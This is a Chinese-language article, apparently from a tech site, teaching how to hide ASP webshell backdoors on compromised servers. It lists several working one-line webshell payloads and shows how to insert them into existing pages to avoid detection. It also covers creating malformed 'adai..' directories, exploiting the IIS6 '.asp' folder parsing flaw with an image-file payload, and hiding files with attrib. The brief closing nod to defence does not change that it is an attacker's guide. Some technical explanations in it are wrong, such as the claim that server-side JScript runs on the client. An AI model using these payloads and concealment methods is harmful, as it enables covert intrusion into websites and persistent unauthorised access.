后門木馬隱藏技術(shù)分析
后門木馬隱藏技術(shù)—webshell的隱藏
比較笨的方法就是找一些比較深或者比較隱蔽的地方放自己的ASP木馬,這個(gè)就不用我說了吧。
下面這些方法,只要大家利用好,做個(gè)隱藏的ASP后門是不成問題的。
1.插馬法
其實(shí),我們可以直接把一句話插入已經(jīng)存在的頁面了,但是,問題出來了,像常用的
- <%execute(request("a"))%>
- <%execute(request("value"))%>
- <%eval request("#")%>
- <%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")
- if Session("b")<>"" then execute Session("b")%>
等等,這些一句話一插進(jìn)去的話,就會(huì)報(bào)錯(cuò),一下就會(huì)被發(fā)現(xiàn)...其實(shí),我們忽略了一個(gè)天天在用的S端
- <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
冰狐的一句話客戶端,這個(gè)調(diào)用的是Javascript腳本,跟調(diào)用Vbscript不同,Javascript是運(yùn)行在客戶端的,也就上一HTML端,所以我們可以直接把他插入在頁面中,而不報(bào)錯(cuò)。這樣,就達(dá)到了隱藏后門的技術(shù)。(建議大家找個(gè)比較大的頁面,隨便插在</td>,</tr>,</body>這些標(biāo)簽后門都可以的)
2.建立非標(biāo)準(zhǔn)目錄
這個(gè)只要有CMDshell 就可以了,當(dāng)然提權(quán)***。直接在站點(diǎn)跟目錄下建立個(gè)文件夾,DOS法:md adai.. 然后在拷貝自己的木馬到這個(gè)目錄下,比如木馬在d:\web\wind.asp 就把他拷貝到d:\web\adai..\wind.asp 這樣,也可以起到隱藏作用。
3.include調(diào)用法
知道最近出了個(gè)動(dòng)易的ODAY么,就是利用03服務(wù)器的IIS解析的漏洞,我給大家講解下,03服務(wù)器會(huì)對asp的文件進(jìn)行解析,這樣就可以達(dá)到我們隱藏后門的技術(shù)了,大家會(huì)經(jīng)??吹?/p>
- :<!--#include file=”.../conn.asp”-->
之類的代碼吧,OK,咱們就利用這個(gè)方法來隱藏。
先建立個(gè)普通的asp文件夾(記著,是文件夾),例如adai.asp,然后再在adai.asp里面建立個(gè)圖片文件如adai.jpg。在里面插入一句話代碼。然后在建立個(gè)文本文件如wind.txt,接著在wind.txt里插入:<!--#include file=”.../adai.jpg”-->。這樣咱們在訪問站點(diǎn)的wind.txt時(shí),就是我們的一句話后門了,有些菜鳥可能會(huì)問
- <!--#include file=”.../adai.jpg”-->
是ASP的內(nèi)容,怎么能在JPG里生效呢?我剛才不是說了么,03服務(wù)器的IIS會(huì)解析asp文件么。所以我們在訪問adai.jpg時(shí),他就誤認(rèn)為在訪問wind.asp了。這種方法在隱藏方面也是很不錯(cuò)的,大家可以把a(bǔ)dai.jpg放在別的目錄里,記得更改下include file里的路徑就可以了。
如果怕被管理員發(fā)現(xiàn)adai.asp時(shí),咱們可以把他隱藏起來啊 DOS下輸入:
- attrib +H +S adai.asp
木馬的防止一直是令人頭疼的事,希望大家通過以上的介紹能夠了解了后門木馬的隱藏技術(shù),已達(dá)到知己知彼百戰(zhàn)百勝,
【編輯推薦】